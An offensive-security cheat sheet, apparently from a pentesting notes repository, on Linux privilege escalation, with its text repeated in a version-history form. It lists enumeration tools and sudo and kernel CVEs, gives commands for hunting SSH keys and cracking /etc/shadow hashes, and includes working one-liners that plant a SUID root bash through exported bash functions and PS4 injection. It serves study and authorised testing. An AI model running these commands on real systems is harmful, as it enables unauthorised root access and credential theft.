killchain-compendium/Post Exploitation/Linux PrivEsc.md

# Linux Privilege Escalation

## Links
* [Basics](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
* [LinEnum](https://github.com/rebootuser/LinEnum)
* [Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh)
* [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester)
* [GTFObins](https://gtfobins.github.io/) 
* [Linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)

## Kernel Exploits

### Dirty COW
* [CVE-2016-5195](https://dirtycow.ninja/)
* [c0w.c](../kernel-exploits/dirtycow)

## Stored Keys & Passwords
* History
* Environment Variables 
* Config + Dot Files
* SSH keys
```sh
find / -type f -name "authorized_keys" -o -name "id_rsa" 2>/dev/null
```

## Permissions
* Weak permissions
* Umask
* Unshadow via `unshadow /etc/passd /etc/shadow > unshadow.txt` and john or hashcat.
    * e.g. `john --wordlist=./wordlist --format=crypt hash`
* SUID
    * list
    ```sh
    find / -perm /6000 -ls 2>dev/null
    ```
    * [Shared object injection](../../../exploit/linux/shared_object_injection.md)
    * [CVE-2016-1247](https://www.cvedetails.com/cve/CVE-2016-1247/)
* User specific files
```sh
find / -user root -name "*.txt"
```

## Sudo Binary
* [Baron Samedit](../../../exploit/linux/sudo/baron_samedit.md)
* [CVE-2019-14287](../../../exploit/linux/sudo/CVE_2019_14287.md)
* [CVE-2019-18634](../../../exploit/linux/sudo/CVE_2019_18634.md)
* [LD_PRELOAD](../../../exploit/linux/ld_preload.md)
* `sudo -l` 
    * Take a look at GTFObins
    * Keep an eye on the displayed host and env capabilities 
    
## PATH Hijacking
* Interpositioning binaries via PATH
    * Look for binaries used in other bins and scripts
    * Interposition name and add the directory in front of  `$PATH`

## Bash function
* Interpositioning of binaries via bash functions
```sh
function /path/to/binary() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
```
```sh
export -f /path/to/binary
```
* Call binary which invokes this function

## Environment Variable
```sh
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '<binary>; set +x; /tmp/bash -p'
```

## Capabilities
* [capabilities](../../../exploit/linux/capabilities.md)

## Crontab
* Check `cat /etc/crontab`
* Check writable scripts and binaries that are scheduled
* Check `$PATH` order

## NFS Rootsquash
* [nfs rootsquash](../../../exploit/linux/nfs_rootsquash.md)
restructured Post Exploitation 2022-11-11 01:15:07 +01:00			`# Linux Privilege Escalation`

			`## Links`
			`* [Basics](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)`
			`* [LinEnum](https://github.com/rebootuser/LinEnum)`
			`* [Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh)`
			`* [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester)`
			`* [GTFObins](https://gtfobins.github.io/)`
			`* [Linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)`

			`## Kernel Exploits`

			`### Dirty COW`
			`* [CVE-2016-5195](https://dirtycow.ninja/)`
			`* [c0w.c](../kernel-exploits/dirtycow)`

			`## Stored Keys & Passwords`
			`* History`
			`* Environment Variables`
			`* Config + Dot Files`
			`* SSH keys`
			```sh
			`find / -type f -name "authorized_keys" -o -name "id_rsa" 2>/dev/null`
			```

			`## Permissions`
			`* Weak permissions`
			`* Umask`
			* Unshadow via `unshadow /etc/passd /etc/shadow > unshadow.txt` and john or hashcat.
			* e.g. `john --wordlist=./wordlist --format=crypt hash`
			`* SUID`
			`* list`
			```sh
			`find / -perm /6000 -ls 2>dev/null`
			```
			`* [Shared object injection](../../../exploit/linux/shared_object_injection.md)`
			`* [CVE-2016-1247](https://www.cvedetails.com/cve/CVE-2016-1247/)`
			`* User specific files`
			```sh
			`find / -user root -name "*.txt"`
			```

			`## Sudo Binary`
			`* [Baron Samedit](../../../exploit/linux/sudo/baron_samedit.md)`
			`* [CVE-2019-14287](../../../exploit/linux/sudo/CVE_2019_14287.md)`
			`* [CVE-2019-18634](../../../exploit/linux/sudo/CVE_2019_18634.md)`
			`* [LD_PRELOAD](../../../exploit/linux/ld_preload.md)`
			* `sudo -l`
			`* Take a look at GTFObins`
			`* Keep an eye on the displayed host and env capabilities`

			`## PATH Hijacking`
			`* Interpositioning binaries via PATH`
			`* Look for binaries used in other bins and scripts`
			* Interposition name and add the directory in front of `$PATH`

			`## Bash function`
			`* Interpositioning of binaries via bash functions`
			```sh
			`function /path/to/binary() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }`
			```
			```sh
			`export -f /path/to/binary`
			```
			`* Call binary which invokes this function`

			`## Environment Variable`
			```sh
			`env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '<binary>; set +x; /tmp/bash -p'`
			```

			`## Capabilities`
			`* [capabilities](../../../exploit/linux/capabilities.md)`

			`## Crontab`
			* Check `cat /etc/crontab`
			`* Check writable scripts and binaries that are scheduled`
			* Check `$PATH` order

			`## NFS Rootsquash`
			`* [nfs rootsquash](../../../exploit/linux/nfs_rootsquash.md)`